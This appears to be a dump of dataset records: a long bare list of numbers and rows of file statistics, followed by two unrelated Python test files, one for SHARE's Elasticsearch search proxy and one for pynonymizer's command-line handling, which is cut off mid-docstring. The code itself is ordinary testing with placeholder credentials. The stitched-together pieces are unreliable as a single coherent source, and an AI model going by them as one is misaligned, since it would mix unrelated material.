-4.53058010718047, -4.51933985531769, -4.48348483127313, -4.4789489171353, -4.47394478794731, -4.46774231867997, -4.44509259526265, -4.44393091915643, -4.41519434826907, -4.40567579039357, -4.38984168168106, -4.38016997298702, -4.35618957798525, -4.35084831820702, -4.35027464418738, -4.34908071042421, -4.32140309049286, -4.3026983120069, -4.28127018096359, -4.26972319433717, -4.26279848868902, -4.25560959729774, -4.25373930341165, -4.23797385436194, -4.23669738961331, -4.22149916876285, -4.18723301641402, -4.18190189283134, -4.18100834652305, -4.16968343025405, -4.14868010962359, -4.14457377659363, -4.14239705929054, -4.14047669165511, -4.11415349374522, -4.11135553123405, -4.10575170887277, -4.09232563163418, -4.09001981140879, -4.08683323132099, -4.06467422195542, -4.06015133811765, -4.05869532969368, -4.04635050515043, -4.03120132024633, -4.01617685055156, -3.96666702360362, -3.96111826986238, -3.96088412029899, -3.92779757574645, -3.92663168005016, -3.91628868482989, -3.90326485061218, -3.8902413394591, -3.88856013085311, -3.88853056225145, -3.88646320176686, -3.86721023073069, -3.86668849343774, -3.86148832472908, -3.86053574623235, -3.86008300380152, -3.83684112266378, -3.83282840214479, -3.81732132568477, -3.78993550268502, -3.78016445091877, -3.77412655275942, -3.77249249109146, -3.74057457477842, -3.73755650219373, -3.73226395329731, -3.72386617201012, -3.72021562121906, -3.71898137800479, -3.71465105176757, -3.70112389718105, -3.6727357100468, -3.65198571605545, -3.64391833103247, -3.6297016692636, -3.62810333515983, -3.608608201615, -3.58299251896378, -3.5821486739471, -3.57436950378065, -3.57244462966279, -3.56929711128091, -3.56414715368633, -3.5465551444108, -3.54574405303921, -3.54378507078218, -3.54374843954636, -3.53627979821756, -3.53243955993852, -3.5291363433243, -3.52643657837631, -3.52506369870443, -3.51789646877019, -3.51576723748925, -3.50927661941198, -3.50798217407424, -3.48539377978139, -3.47420239243753, -3.46141463323791, -3.46024518051199, -3.45973890216053, -3.45875555338156, -3.41725292690291, -3.41497199034076, -3.41104150037547, -3.39358717592219, -3.39213960981569, -3.38745902791139, -3.38348051871965, -3.37430019897601, -3.36031348867417, -3.34441155395612, -3.34229004818493, -3.32998660406781, -3.31605346212567, -3.30959669083528, -3.30698486763005, -3.30236924631106, -3.29820033833118, -3.29401239991304, -3.29346112379973, -3.29070668028697, -3.28648843706492, -3.27989558333408, -3.27691418241743, -3.27200608439279, -3.27058992995483, -3.26573893978849, -3.25113134851702, -3.24546302689538, -3.24467195487936, -3.23935453458173, -3.23110167819537, -3.2238276633626, -3.21674202072185, -3.20865216914659, -3.19892803116475, -3.18854086902297, -3.18423974989327, -3.18265949423004, -3.16870357712785, -3.16532353749055, -3.15622209295322, -3.1552324492251, -3.15395372424389, -3.15118990810437, -3.13021741861799, -3.12559133401462, -3.11240135367784, -3.11217628549985, -3.10828152469296, -3.10533515880712, -3.10308704679552, -3.09299592894098, -3.09093642543836, -3.09079988688351, -3.08997117150615, -3.07307851860216, -3.07210350144952, -3.06415790295611, -3.05788627034772, -3.05162979971371, -3.05078244282525, -3.05043285501393, -3.04950378251821, -3.0392394168758, -3.03511181367061, -3.0349059504027, -3.02833441418166, -3.025363962075, -3.01031424112599, -2.99641559568854, -2.98536912788274, -2.98489702593985, -2.98008594073884, -2.97765479033361, -2.97339459676949, -2.97027828134747, -2.96776098678398, -2.96512122723563, -2.96421529567905, -2.96251814148259, -2.95549465020861, -2.95408873676075, -2.95281226047047, -2.9344291340757, -2.93432434536786, -2.93002562218533, -2.92900680356523, -2.92694516038843, -2.92587242998372, -2.92503107366644, -2.92065571663921, -2.9110643721586, -2.89443532386475, -2.89442844994519, -2.86978685645832, -2.85943837208249, -2.85387228779441, -2.83373560028208, -2.83254376531638, -2.82702383493164, -2.82083700652804, -2.81850808228868, -2.80867573129957, -2.80781001620288, -2.80048681845322, -2.80032756014568, -2.79741968162439, -2.79596140349676, -2.78506132231634, -2.78284483026523, -2.7800802743299, -2.77780812004533, -2.76859332955662, -2.76224188325119, -2.74638852169022, -2.74189460920298, -2.74176761117359, -2.73705167951016, -2.73572136828971, -2.72884879914086, -2.72804003474724, -2.72802748955124, -2.72121307897118, -2.71132694596897, -2.7106737455993, -2.69221752992228, -2.6858838877386, -2.67936620209641, -2.67742461607703, -2.67522471223764, -2.67468122321351, -2.66706478775549, -2.66542815683533, -2.6638899973071, -2.6591427901747, -2.65449278371109, -2.6498856835267, -2.6468478815723, -2.64132067622366, -2.62703509095644, -2.62600762120414, -2.6255669632796, -2.62543650333752, -2.6248465982971, -2.62479477935021, -2.62156069698757, -2.6196490309563, -2.6189845962678, -2.61734717079125, -2.61395378406467, -2.60130128799689, -2.59894719086357, -2.59803358347537, -2.59268243788184, -2.5881980630896, -2.58650578537472, -2.58323535214077, -2.57377538537865, -2.56855584008607, -2.56732158394214, -2.5620420166921, -2.56155766302635, -2.55893433096706, -2.54877246832393, -2.54620547834289, -2.53769881863222, -2.52879229374978, -2.52689232596764, -2.5222870603308, -2.51900276142976, -2.50285674743039, -2.50031889131413, -2.4949158812924, -2.49139711942209, -2.48812939258639, -2.48383568506359, -2.47998929963482, -2.47588659071293, -2.47212391684667, -2.46868127491303, -2.4666390582227, -2.46268553769944, -2.45542879893428, -2.45313080031999, -2.45058338417446, -2.43997330504517, -2.4388147705156, -2.43675681357139, -2.43362585935822, -2.4320543755034, -2.43034015973118, -2.42975616820674, -2.4284167206258, -2.42840120325971, -2.42557735615568, -2.41752122107817, -2.41695562741707, -2.41469603158351, -2.40765091259847, -2.40099303490722, -2.39761029925005, -2.39143127517876, -2.38921730971439, -2.37354485968924, -2.37008913736568, -2.36907875332741, -2.36085587755146, -2.35541216581853, -2.35499775477767, -2.35483214155369, -2.35070694879604, -2.34524287183516, -2.34507119777619, -2.34349521897481, -2.33765735033273, -2.3302582533367, -2.32533368220489, -2.3130760663946, -2.30834983167064, -2.30614355271168, -2.30436640666394, -2.2959493427459, -2.29560949598717, -2.29415492436455, -2.28988219699669, -2.27987657429476, -2.26747189590981, -2.26728600354136, -2.26217920539588, -2.25995201153298, -2.25868195286177, -2.24643023228834, -2.24419337219989, -2.22646753427998, -2.2248842157761, -2.21857327985432, -2.21673728593081, -2.21105867150559, -2.20860428693124, -2.20703342922843, -2.20663361700686, -2.20583784790456, -2.19848235739652, -2.19315969555728, -2.19199814376301, -2.19073833511308, -2.17433630908843, -2.17346520150056, -2.16156703827477, -2.16073137533335, -2.15399869414511, -2.15258549410078, -2.14925922904975, -2.14499668676072, -2.14446876519314, -2.13380114327829, -2.13157357686132, -2.13152501741489, -2.12564373875284, -2.12083939056405, -2.11616109041893, -2.11533374684416, -2.1153073664903, -2.10681104845128, -2.10574664635352, -2.10277015776226, -2.1012183024032, -2.1004697087009, -2.09468160013629, -2.09149244560058, -2.08205219304469, -2.07685709593545, -2.07345361601096, -2.07211556813827, -2.05252517024539, -2.04934610492274, -2.04871672377998, -2.04670854627056, -2.0400029596935, -2.03931378429032, -2.03808888829879, -2.03375667864032, -2.03072390622845, -2.02359300958761, -2.01988602190739, -2.01474367779591, -2.00669398273574, -2.00354457486203, -1.99369290915384, -1.99024871387742, -1.98445859115386, -1.9821294855594, -1.97924778860837, -1.96692563333921, -1.96492470874042, -1.9644918223324, -1.96084409424985, -1.95320676156059, -1.93599010446892, -1.93441506584989, -1.9336134502564, -1.92805935288047, -1.9280244354887, -1.91901672737759, -1.91272578031586, -1.91150876386419, -1.90073423791214, -1.89957983020343, -1.88765495072017, -1.88622428890795, -1.88608611875168, -1.88531486347853, -1.87717273864848, -1.87658305870155, -1.87549862121653, -1.87073425916746, -1.86981225704331, -1.86872330459009, -1.86639491917143, -1.86529601002448, -1.86103342961632, -1.85776566863776, -1.84885822239558, -1.84457033937804, -1.84133858785801, -1.83923593052807, -1.83372921246915, -1.82417848446868, -1.82095539634476, -1.81888404766071, -1.81299618469462, -1.80668342478886, -1.80258262438383, -1.79870864312059, -1.79617739391335, -1.79598032193387, -1.79344908452896, -1.79246569229923, -1.79032319641819, -1.78872160656364, -1.78542927907352, -1.78492531186077, -1.78444022854041, -1.78298712630417, -1.78257525222681, -1.78066956692608, -1.77724586121844, -1.77603743244057, -1.77497437252417, -1.76432868130879, -1.76430636567513, -1.75838803509438, -1.75353711286565, -1.75307104343078, -1.75186748297339, -1.75169097375475, -1.74943505108089, -1.74866732133724, -1.7466271458849, -1.74620593433065, -1.74454422989634, -1.74449082726857, -1.73799975015413, -1.72817956395629, -1.72681720539307, -1.72553416973442, -1.7194947508813, -1.71809131961518, -1.71584421005811, -1.71459267042556, -1.71150902527557, -1.71142438616402, -1.70896476317588, -1.70724457088539, -1.7017517285505, -1.69998651599094, -1.69071358483784, -1.68920231264234, -1.68886993315355, -1.67714395258884, -1.66454274603339, -1.66290029197517, -1.65387857628297, -1.65242706346631, -1.65007686752239, -1.64979257195518, -1.64740574748032, -1.64478507070937, -1.63691527242944, -1.63541426577976, -1.6327064573579, -1.63265623866541, -1.63148041397343, -1.62971495288362, -1.62503259960895, -1.62280426560118, -1.61989195197603, -1.61039430903756, -1.60001928103155, -1.59717098280561, -1.59474711580785, -1.59455861619267, -1.59226994066529, -1.58219629028104, -1.58050160213268, -1.57554015279906, -1.57507155306422, -1.5732595618904, -1.571786907985, -1.56617034525202, -1.5630080754445, -1.55512318728101, -1.55174935433394, -1.54963968438918, -1.53477639911934, -1.53247120433308, -1.53241289360217, -1.53206025842873, -1.53014869245035, -1.5255748391867, -1.52499561770544, -1.52149753136422, -1.51907576624032, -1.51788004125355, -1.50196896772363, -1.49754270499549, -1.49752942111276, -1.49314621137239, -1.48357161450625, -1.47396214308553, -1.47087249010024, -1.46898302979973, -1.46611547540387, -1.46500561776518, -1.45595699028627, -1.45490778922291, -1.44350058978854, -1.44089317066432, -1.43555137796401, -1.42790013474591, -1.42177423917028, -1.41703537765471, -1.41404386184681, -1.40567571616606, -1.3993016143028, -1.39744741025476, -1.39650055236661, -1.38821615675844, -1.37981917491177, -1.34453217829785, -1.33543223554228, -1.32748620572223, -1.32619807482176, -1.32256908092003, -1.32086656554565, -1.31093958956234, -1.30612644055616, -1.30218378750615, -1.292390189237, -1.28624821180639, -1.2837370442399, -1.26135848707404, -1.26076130475925, -1.25880691794561, -1.25144698413725, -1.25040616920522, -1.24795259106321, -1.24462610121405, -1.23520396459594, -1.23258565931548, -1.23214383189408, -1.20420769047093, -1.19115956516894, -1.18850141299861, -1.18784132944629, -1.18312197985725, -1.18141103239185, -1.17198667518472, -1.1574473884479, -1.15547302875988, -1.15436184512092, -1.1492782786143, -1.14512772755633, -1.13333472235356, -1.13144201628438, -1.12758436826972, -1.1275262270534, -1.11604170754024, -1.11196663676282, -1.10653838735955, -1.10355835173696, -1.09426621454289, -1.08902293323313, -1.08230964724019, -1.08189678878143, -1.06947177159841, -1.06246750400604, -1.0507235919501, -1.04238716875262, -1.04002845756691, -1.03776283558259, -1.03100089406809, -1.02715039124769, -1.02482140105725, -1.01632881790586, -1.01264478082765, -1.00648174964558, -1.00572341041694, -0.995472313986702, -0.99256485331236, -0.988580000017022, -0.957848063220885, -0.93283578520007, -0.924828866057543, -0.921065089580478, -0.90090746786517, -0.880837749577085, -0.85245992296553, -0.847329067619522, -0.827499774943424, -0.825478162495361, -0.823005326357598, -0.820833134567771, -0.770283884793913, -0.72387440044806, -0.711615267900462, -0.689885884022624, -0.689530886654175, -0.657472831578137, -0.642788428086676, -0.607595078923237, -0.591722161954329, -0.492097069045875, -0.489076513247852, -0.477558238091107, -0.428102620439042, -0.338629448431751, -0.326670211958466, -0.324378464023917, -0.298708415917137, -0.209655625601901, -0.129565619268835, 0.0459296900675103, 0.138587255889901, 0.167122788074793, 0.250164879103255, 0.38805696412105, 0.388117026693325, 0.388226676241142, 0.46114992999589, 0.477397967012959, 0.515148585239905, 0.554924814842295, 0.563932128443976, 0.631964260977664, 0.653223377815047, 0.667694845910074, 0.710098342595984, 0.713170713096676, 0.717989916797078, 0.738811457761873, 0.739235071658754, 0.741557291838533, 0.743043353195949, 0.764158303808917, 0.785388077706216, 0.801267672769671, 0.805025125412237, 0.814814353247987, 0.819279873236768, 0.828760315586074, 0.841718725297425, 0.870852520173949, 0.885189968127755, 0.89381721250527, 0.909470630874892, 0.910520758770315, 0.917015818930873, 0.927323175823553, 0.938036977604359, 0.943106311822479, 0.946348078874905, 0.954635466126727, 0.960191098886339, 0.969856620706237, 0.983343741059723, 0.989355372568323, 0.992604751345429, 0.999630859191061, 1.00192707606825, 1.0091056926022, 1.00913072142497, 1.01400653547193, 1.0451369882041, 1.04720960248872, 1.04848874296014, 1.05206912241713, 1.06840533126208, 1.07177222565555, 1.07765601331905, 1.10044306508489, 1.14521855910075, 1.14721025372615, 1.15117176566609, 1.15368418944538, 1.17365742844115, 1.18232596918433, 1.20252852661979, 1.20690250131736, 1.21028709095634, 1.21334406479577, 1.21732093182956, 1.21801680712667, 1.22436923497591, 1.23329981994489, 1.25977675993613, 1.27576186496016, 1.28173932980657, 1.29279270197421, 1.29807749565535, 1.31514427140457, 1.32277216941972, 1.32309098256522, 1.33327008571054, 1.33832806064235, 1.34075883200151, 1.35250997801875, 1.3539830942859, 1.35850407702677, 1.36778649133896, 1.36862462149624, 1.37363355429464, 1.37484067333569, 1.38754529273882, 1.38872814665393, 1.39558125510676, 1.40814588149176, 1.44557822484993, 1.47530752297389, 1.48156311994824, 1.48401985822081, 1.49274700696083, 1.50033361885617, 1.50091286445433, 1.50346960183587, 1.50558135644419, 1.5274697562299, 1.53155647907915, 1.53603694612939, 1.54847718136891, 1.56878532698145, 1.57310643991257, 1.62162603796759, 1.62724662946682, 1.6311703892394, 1.63278022906532, 1.63286277246058, 1.6390052219977, 1.64216618713934, 1.64774594814051, 1.65108720634525, 1.65419548542931, 1.65507482456591, 1.65686713620059, 1.66119216987342, 1.66324387968644, 1.69538281930072, 1.69943010687876, 1.71835249991339, 1.72218624392784, 1.72665629108124, 1.7305415588152, 1.74247528855006, 1.75904901577023, 1.76789095742535, 1.77612709066103, 1.78511430654618, 1.79136198982229, 1.82142296458901, 1.82427659994177, 1.83141481960834, 1.83407792478098, 1.83507741652202, 1.84156822274656, 1.84604908108617, 1.85206282259832, 1.85501897137491, 1.85514726519441, 1.8725780583658, 1.8733110072085, 1.87702099485335, 1.8819786568054, 1.88653634536034, 1.88852330644768, 1.8922043980357, 1.92516259478729, 1.94267291353469, 1.98582750997238, 1.99285206337604, 1.99651440482193, 2.01260608164314, 2.01988206381339, 2.02654826883426, 2.03618133832892, 2.03962302659235, 2.0693423850561, 2.06986023383023, 2.07015511787096, 2.07981650099165, 2.09031096027266, 2.09794235989014, 2.10257313307331, 2.10283684013321, 2.11076677079529, 2.11345884319228, 2.11997846567281, 2.13480219730788, 2.13849594322748, 2.14014159423894, 2.14179613678729, 2.14546007755766, 2.15640334005494, 2.16179414876137, 2.18403438846943, 2.19811639987397, 2.20619657334253, 2.21422460341567, 2.21452378213307, 2.21627902918735, 2.22041612115193, 2.22517013985275, 2.22755164471054, 2.23416748291575, 2.24069215171696, 2.24153000593021, 2.25022483167014, 2.27827647213403, 2.28982723339836, 2.29243374383072, 2.30501805850302, 2.32158720203675, 2.32176742483064, 2.32178739485438, 2.331543058417, 2.3484316133167, 2.36610293793904, 2.36776511631972, 2.37491717417071, 2.37590849297063, 2.38261363024158, 2.44474259928041, 2.45065300086489, 2.45153772275136, 2.47214468657032, 2.53382334332036, 2.54913699632984, 2.56931454383761, 2.57045306287182, 2.57214556418502, 2.58536599752475, 2.58601242708292, 2.59658440428213, 2.60519113174386, 2.63014087680095, 2.64564991719137, 2.67922294868574, 2.69094444201124, 2.69378604148733, 2.70156045632584, 2.71355896020348, 2.72846673795643, 2.73273068190486, 2.74053944561202, 2.75646951941922, 2.77919130707459, 2.83037773693719, 2.85396841128117, 2.87189699646583, 2.87445930157727, 2.90438045626719, 2.90648625657812, 2.91629826551014, 2.92062296024744, 2.93240975984361, 2.95461889311079, 2.99659804937327, 3.00644546362766, 3.0401219204868, 3.10479018806494, 3.13048800094528, 3.13187383863909, 3.20422879636909, 3.21606576156584, 3.24892400229704, 3.46836466129959, 3.5775741166786, 3.58707758359076, 3.64691463194454, 3.67382885933952, 3.68153339403736, 3.7023603699075, 3.74797284255835, 3.76800916543556, 3.84570423193084, 4.01723852946342, 4.06951125405614, 4.11724952712395, 4.12817984248988, 4.20874721492816, 4.32576917599121, 4.63994743989415, 4.78808672479767, 4.8547560668931, 5.63873268099544]
| 6,914.111111
| 20,134
| 0.799331
| 6,652
| 62,227
| 7.476548
| 0.163259
| 0.001508
| 0.001609
| 0.00181
| 0.971187
| 0.971187
| 0.971187
| 0.971187
| 0.971187
| 0.971187
| 0
| 0.844277
| 0.053578
| 62,227
| 8
| 20,135
| 7,778.375
| 0.000204
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
7a0bd3cd97182d852d26f491ed0ca60f813019b2
| 7,064
|
py
|
Python
|
tests/api/test_elasticsearch.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
tests/api/test_elasticsearch.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
tests/api/test_elasticsearch.py
|
felliott/SHARE
|
8fd60ff4749349c9b867f6188650d71f4f0a1a56
|
[
"Apache-2.0"
] | null | null | null |
from furl import furl
from unittest import mock
import pytest
class TestElasticSearchProxy:
def test_cannot_put(self, client):
assert client.put('/api/v2/search/').status_code == 405
assert client.put('/api/v2/search/thing').status_code == 405
assert client.put('/api/v2/search/_count').status_code == 405
assert client.put('/api/v2/search/_search').status_code == 405
assert client.put('/api/v2/search/type/index').status_code == 405
assert client.put('/api/v2/search/type/index/_thing').status_code == 405
def test_cannot_delete(self, client):
assert client.delete('/api/v2/search/').status_code == 405
assert client.delete('/api/v2/search/thing').status_code == 405
assert client.delete('/api/v2/search/_count').status_code == 405
assert client.delete('/api/v2/search/_search').status_code == 405
assert client.delete('/api/v2/search/type/index').status_code == 405
assert client.delete('/api/v2/search/type/index/_thing').status_code == 405
def test_cannot_access_bulk(self, client):
assert client.delete('/api/v2/search/_bulk').status_code == 405
assert client.delete('/api/v2/search/_bulk?test').status_code == 405
assert client.delete('/api/v2/search/type/_bulk?foo').status_code == 405
assert client.delete('/api/v2/search/type/index/_bulk').status_code == 405
def test_scroll_forbidden(self, client):
assert client.post('/api/v2/search/_search/scroll').status_code == 403
assert client.post('/api/v2/search/_search/?scroll=1m').status_code == 403
assert client.get('/api/v2/search/_search/scroll').status_code == 403
assert client.get('/api/v2/search/_search/?scroll=1m').status_code == 403
@pytest.mark.parametrize('url', [
'/api/v2/search/type',
'/api/v2/search/type/',
'/api/v2/search/type/id',
'/api/v2/search/type/id/',
'/api/v2/search/type/id/some/thing/else',
'/api/v2/search/type/id/some/thing/else/',
'/api/v2/search/type/id/_search',
'/api/v2/search/type/id/_search/',
'/api/v2/search/type/id/some/thing/else/_search',
'/api/v2/search/type/id/some/thing/else/_search/',
'/api/v2/search/type/id/some/thing/else/_count',
'/api/v2/search/type/id/some/thing/else/_count/',
'/api/v2/search/_coun',
'/api/v2/search/__count',
'/api/v2/search/_counttttttttttt',
'/api/v2/search/_sear',
'/api/v2/search/__search',
'/api/v2/search/_searchh',
'/api/v2/search/_sugges',
'/api/v2/search/__suggest',
'/api/v2/search/_ssuggest',
])
def test_limitted_post(self, url, client):
with mock.patch('api.search.views.requests.post') as post:
post.return_value = mock.Mock(status_code=500, json=lambda: {})
assert client.post(url, '{}', content_type='application/json').status_code in (403, 405)
@pytest.mark.parametrize('url', [
'/api/v2/search/type',
'/api/v2/search/type/',
'/api/v2/search/type/id/some/thing/else',
'/api/v2/search/type/id/some/thing/else/',
'/api/v2/search/type/id/_search',
'/api/v2/search/type/id/_search/',
'/api/v2/search/type/id/some/thing/else/_search',
'/api/v2/search/type/id/some/thing/else/_search/',
'/api/v2/search/type/id/some/thing/else/_count',
'/api/v2/search/type/id/some/thing/else/_count/',
'/api/v2/search/_coun',
'/api/v2/search/__count',
'/api/v2/search/_counttttttttttt',
'/api/v2/search/_sear',
'/api/v2/search/__search',
'/api/v2/search/_searchh',
'/api/v2/search/_mapping',
'/api/v2/search/__mappings',
'/api/v2/search/_mappingss',
])
def test_limitted_get(self, url, client):
with mock.patch('api.search.views.requests.get') as get:
get.return_value = mock.Mock(status_code=500, json=lambda: {})
assert client.post(url).status_code == 403
def test_post_search(self, client):
urls = (
'/api/v2/search/_search',
'/api/v2/search/_search/',
'/api/v2/search/_suggest',
'/api/v2/search/_suggest/',
'/api/v2/search/type/_count',
'/api/v2/search/type/_count/',
'/api/v2/search/type/_search',
'/api/v2/search/type/_search/',
'/api/v2/search/type/_suggest',
'/api/v2/search/type/_suggest/',
)
with mock.patch('api.search.views.requests.post') as post:
post.return_value = mock.Mock(status_code=200, json=lambda: {})
for url in urls:
assert client.post(url, '{}', content_type='application/json').status_code == 200
def test_cannot_post(self, client):
urls = (
'/api/v2/search/_mappings/',
'/api/v2/search/_mappings',
'/api/v2/search/_mappings/creativeworks',
'/api/v2/search/_mappings/creativeworks/',
)
with mock.patch('api.search.views.requests.post') as post:
post.return_value = mock.Mock(status_code=500, json=lambda: {})
for url in urls:
assert client.post(url, '{}', content_type='application/json').status_code == 405
@pytest.mark.parametrize('url', [
'/api/v2/search/_search',
'/api/v2/search/_search/',
'/api/v2/search/type/_count',
'/api/v2/search/type/_count/',
'/api/v2/search/type/_search',
'/api/v2/search/type/_search/',
'/api/v2/search/_mappings/',
'/api/v2/search/_mappings',
'/api/v2/search/_mappings/creativeworks',
'/api/v2/search/_mappings/creativeworks/',
'/api/v2/search/creativeworks/some-id',
'/api/v2/search/creativeworks/some-id/',
'/api/v2/search/agent/some-id/',
'/api/v2/search/agent/some_id/',
])
def test_get_search(self, url, client):
with mock.patch('api.search.views.requests.get') as get:
get.return_value = mock.Mock(status_code=200, json=lambda: {})
assert client.get(url).status_code == 200
def test_cannot_get(self, client):
urls = (
'/api/v2/search/_suggest',
'/api/v2/search/_suggest/',
'/api/v2/search/type/_suggest',
'/api/v2/search/type/_suggest/',
)
with mock.patch('api.search.views.requests.get') as get:
get.return_value = mock.Mock(status_code=500, json=lambda: {})
for url in urls:
assert client.get(url).status_code == 405
def test_elastic_proxy(self, client, elastic):
with mock.patch('api.search.views.requests.get') as get:
get.return_value = mock.Mock(status_code=200, json=lambda: {})
client.get('/api/v2/search/_search')
elastic_url = furl('{}{}/{}'.format(elastic.es_url, elastic.es_index, '_search'))
get.assert_called_with(elastic_url)
| 44.427673
| 100
| 0.605606
| 922
| 7,064
| 4.47397
| 0.081345
| 0.112727
| 0.248
| 0.145455
| 0.904
| 0.896727
| 0.858182
| 0.841939
| 0.803152
| 0.721212
| 0
| 0.035844
| 0.221971
| 7,064
| 158
| 101
| 44.708861
| 0.714702
| 0
| 0
| 0.586207
| 0
| 0
| 0.408975
| 0.362967
| 0
| 0
| 0
| 0
| 0.186207
| 1
| 0.075862
| false
| 0
| 0.02069
| 0
| 0.103448
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e1498976356a84e48973f123e26d5a648d86d28e
| 22,272
|
py
|
Python
|
tests/test_main.py
|
HenkWillcock/pynonymizer
|
8ae39449be46da3f6ed87eaced50485160fbf21d
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
HenkWillcock/pynonymizer
|
8ae39449be46da3f6ed87eaced50485160fbf21d
|
[
"MIT"
] | null | null | null |
tests/test_main.py
|
HenkWillcock/pynonymizer
|
8ae39449be46da3f6ed87eaced50485160fbf21d
|
[
"MIT"
] | null | null | null |
import pytest
import unittest
from unittest.mock import patch, Mock, mock_open
from pynonymizer.__main__ import main
from pynonymizer.pynonymize import ArgumentValidationError, DatabaseConnectionError, pynonymize
from types import SimpleNamespace
def test_pynonymize_missing_db_credentials():
with pytest.raises(ArgumentValidationError):
pynonymize(
input_path="input.sql",
strategyfile_path="strategyfile.yml",
output_path="output.sql",
db_user=None,
db_password=None
)
@patch("dotenv.find_dotenv")
@patch("dotenv.load_dotenv")
@patch("pynonymizer.__main__.create_parser")
@patch("pynonymizer.__main__.pynonymize", autospec=True)
class MainArgTests(unittest.TestCase):
def setUp(self):
self.parsed_args = SimpleNamespace(
legacy_input=None,
legacy_strategyfile=None,
legacy_output=None,
input="TEST_INPUT",
strategyfile="TEST_STRATEGYFILE",
output="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="TEST_START_AT_STEP",
skip_steps=["TEST_SKIP_1", "TEST_SKIP_2"],
stop_at_step="TEST_STOP_AT_STEP",
seed_rows=None,
mssql_backup_compression=False,
mysql_dump_opts="--compatible=mysql4 --max_allowed_packet=1024M",
dry_run=True,
verbose=True
)
def test_dotenv_called(self, pynonymize, create_parser, load_dotenv, find_dotenv):
"""
dotenv should be called
"""
parser_mock = Mock(parse_args=Mock(return_value=self.parsed_args))
create_parser.return_value = parser_mock
main([])
find_dotenv.assert_called()
load_dotenv.assert_called()
def test_arg_pass_legacy_override(self, pynonymize, create_parser, load_dotenv, find_dotenv):
"""
the parsed set of args should be passed to the pynonymize main function
legacy args should override normal ones to account for old positional behaviour
"""
self.parsed_args.legacy_input = "LEGACY_INPUT"
self.parsed_args.legacy_strategyfile = "LEGACY_STRATEGYFILE"
self.parsed_args.legacy_output = "LEGACY_OUTPUT"
parser_mock = Mock(parse_args=Mock(return_value=self.parsed_args))
create_parser.return_value = parser_mock
main([])
create_parser.assert_called()
parser_mock.parse_args.assert_called()
call_kwargs = pynonymize.call_args[1]
assert call_kwargs["input_path"] == "LEGACY_INPUT"
assert call_kwargs["strategyfile_path"] == "LEGACY_STRATEGYFILE"
assert call_kwargs["output_path"] == "LEGACY_OUTPUT"
def test_arg_pass_normal(self, pynonymize, create_parser, load_dotenv, find_dotenv):
"""
the parsed set of args should be passed to the pynonymize main function
"""
parser_mock = Mock(parse_args=Mock(return_value=self.parsed_args))
create_parser.return_value = parser_mock
main([])
create_parser.assert_called()
parser_mock.parse_args.assert_called()
pynonymize.assert_called_once_with(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="TEST_TYPE",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
start_at_step="TEST_START_AT_STEP",
skip_steps=["TEST_SKIP_1", "TEST_SKIP_2"],
stop_at_step="TEST_STOP_AT_STEP",
seed_rows=None,
mssql_backup_compression=False,
mysql_dump_opts="--compatible=mysql4 --max_allowed_packet=1024M",
dry_run=True,
verbose=True
)
@patch("dotenv.find_dotenv", Mock())
@patch("dotenv.load_dotenv", Mock())
@patch("pynonymizer.__main__.create_parser", Mock())
@patch("pynonymizer.__main__.pynonymize", Mock(side_effect=ArgumentValidationError(["test validation"])))
def test_sysexit_on_argument_invalid():
"""
If pynonymize throws an argument validation error, main should exit with err 2
"""
with pytest.raises(SystemExit) as e_info:
main(["blah"])
assert e_info.value.code == 2
@patch("dotenv.find_dotenv", Mock())
@patch("dotenv.load_dotenv", Mock())
@patch("pynonymizer.__main__.create_parser", Mock())
@patch("pynonymizer.__main__.pynonymize", Mock(side_effect=DatabaseConnectionError()))
def test_sysexit_on_database_connection_error():
"""
If pynonymize throws an argument validation error, main should exit with err 1
"""
with pytest.raises(SystemExit) as e_info:
main(["blah"])
assert e_info.value.code == 1
@patch("dotenv.find_dotenv", Mock())
@patch("dotenv.load_dotenv", Mock())
@patch("pynonymizer.pynonymize.read_config")
@patch("pynonymizer.pynonymize.get_provider")
@patch("pynonymizer.pynonymize.FakeColumnGenerator")
@patch("pynonymizer.pynonymize.StrategyParser")
@patch("builtins.open", mock_open(read_data="TESTFILEDATA"))
class MainProcessTests(unittest.TestCase):
def test_any_db_kwarg(self, StrategyParser, FakeColumnSet, get_provider, read_config):
"""
test that dynamic args are passed to the provider properly e.g. mssql_blah
"""
pynonymize(
input_path="TEST_INPUT",
strategyfile_path="TEST_STRATEGYFILE",
output_path="TEST_OUTPUT",
db_type="mssql",
db_host="TEST_HOST",
db_port="TEST_PORT",
db_name="TEST_NAME",
db_user="TEST_USER",
db_password="TEST_PASSWORD",
fake_locale="TEST_LOCALE",
mysql_other_amazing_var="TEST_DYNAMIC_VAR", # as this is mssql, this should be ignored
mssql_special_provider_var="TEST_DYNAMIC_VAR2"
)
StrategyParser.return_value.parse_config.assert_called()
get_provider.assert_called_with(type="mssql", db_host="TEST_HOST", db_port="TEST_PORT", db_user="TEST_USER", db_pass="TEST_PASSWORD", db_name="TEST_NAME", seed_rows=150, special_provider_var="TEST_DYNAMIC_VAR2")
def test_pynonymize_main_process(self, StrategyParser, FakeColumnSet, get_provider, read_config):
"""
